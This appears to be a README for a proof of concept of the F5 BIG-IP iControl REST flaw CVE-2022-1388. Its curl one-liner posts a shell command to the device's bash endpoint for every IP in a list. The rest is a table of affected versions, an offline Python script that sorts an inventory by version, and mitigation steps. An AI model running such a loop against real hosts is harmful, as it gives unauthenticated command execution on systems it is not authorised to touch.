BIG-IP iControl REST vulnerability CVE-2022-1388 PoC
This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.
PoC
You can use the following curl one-liner to check for the F5 BIG-IP vulnerability, or use the provided Python script.
```bash
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
```

Vulnerable Versions (BIG-IP)
| Branch | Vulnerable Versions | Fixes Introduced |
|---|---|---|
| 11.x | 11.6.1-11.6.5 | No Fix |
| 12.x | 12.1.0-12.1.6 | No Fix |
| 13.x | 13.1.0-13.1.4 | 13.1.5 |
| 14.x | 14.1.0-14.1.4 | 14.1.4.6 |
| 15.x | 15.1.0-15.1.5 | 15.1.5.1 |
| 16.x | 16.1.0-16.1.2 | 16.1.2.2 |
| 17.x | None | 17.0.0 |
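To triage an inventory from reported version numbers alone, without sending anything to the devices, here is an added example (not code from this repo) that encodes the table above; the helper names, hostnames and versions in it are constructed for the example.

```python
# Added example, not code from the PoC repo: classify a BIG-IP version string
# against the table above so an inventory can be triaged offline.
# Helper names and the sample inventory are this example's own.
from typing import Optional, Tuple

def parse_version(text: str) -> Tuple[int, ...]:
    """'14.1.4.6' -> (14, 1, 4, 6); int tuples compare component-wise."""
    return tuple(int(p) for p in text.strip().split("."))

# Per branch: (first vulnerable, last vulnerable, first fixed build); None = "No Fix".
AFFECTED = {
    11: ("11.6.1", "11.6.5", None),
    12: ("12.1.0", "12.1.6", None),
    13: ("13.1.0", "13.1.4", "13.1.5"),
    14: ("14.1.0", "14.1.4", "14.1.4.6"),
    15: ("15.1.0", "15.1.5", "15.1.5.1"),
    16: ("16.1.0", "16.1.2", "16.1.2.2"),
    17: None,  # the 17.x row has no vulnerable range
}

def is_vulnerable(version: str) -> Optional[bool]:
    """True: in a vulnerable range. False: fixed or unaffected.
    None: major branch not covered by the table (check by hand)."""
    v = parse_version(version)
    if v[0] not in AFFECTED:
        return None
    row = AFFECTED[v[0]]
    if row is None:
        return False
    lo, hi = parse_version(row[0]), parse_version(row[1])
    fix = parse_version(row[2]) if row[2] else None
    # The upper bound is a release ("14.1.4"), so compare only that many
    # components: 14.1.4.5 is inside the range, 14.1.5 is not. A build at or
    # above the fix (14.1.4.6) is patched even though it starts with 14.1.4.
    if not (v >= lo and v[:len(hi)] <= hi):
        return False
    return fix is None or v < fix

def needs_patch(inventory: dict) -> list:
    # Hosts whose reported version is vulnerable or could not be classified.
    return sorted(h for h, ver in inventory.items()
                  if is_vulnerable(ver) is not False)

# Constructed sample inventory: hostnames and versions are made up.
SAMPLE_INVENTORY = {
    "lb-edge-1": "16.1.2.1",  # vulnerable, below the 16.1.2.2 fix
    "lb-edge-2": "14.1.4.6",  # patched
    "lb-core-1": "12.1.6",    # vulnerable and the branch has no fix
    "lb-lab-1": "17.0.0",     # unaffected branch
    "lb-old-1": "10.2.4",     # not in the table, classify by hand
}
```

`needs_patch(SAMPLE_INVENTORY)` returns the three hosts that still need action; a host on an unlisted branch is deliberately kept in the list rather than silently treated as safe.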
Mitigation
- Upgrade to the fixed version in the `Fixes Introduced` column (preferred method)
- Block iControl REST access through the self IP address
- Block iControl REST access through the management interface
- Modify the BIG-IP httpd configuration
For more information about mitigation, check out the references.
References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit
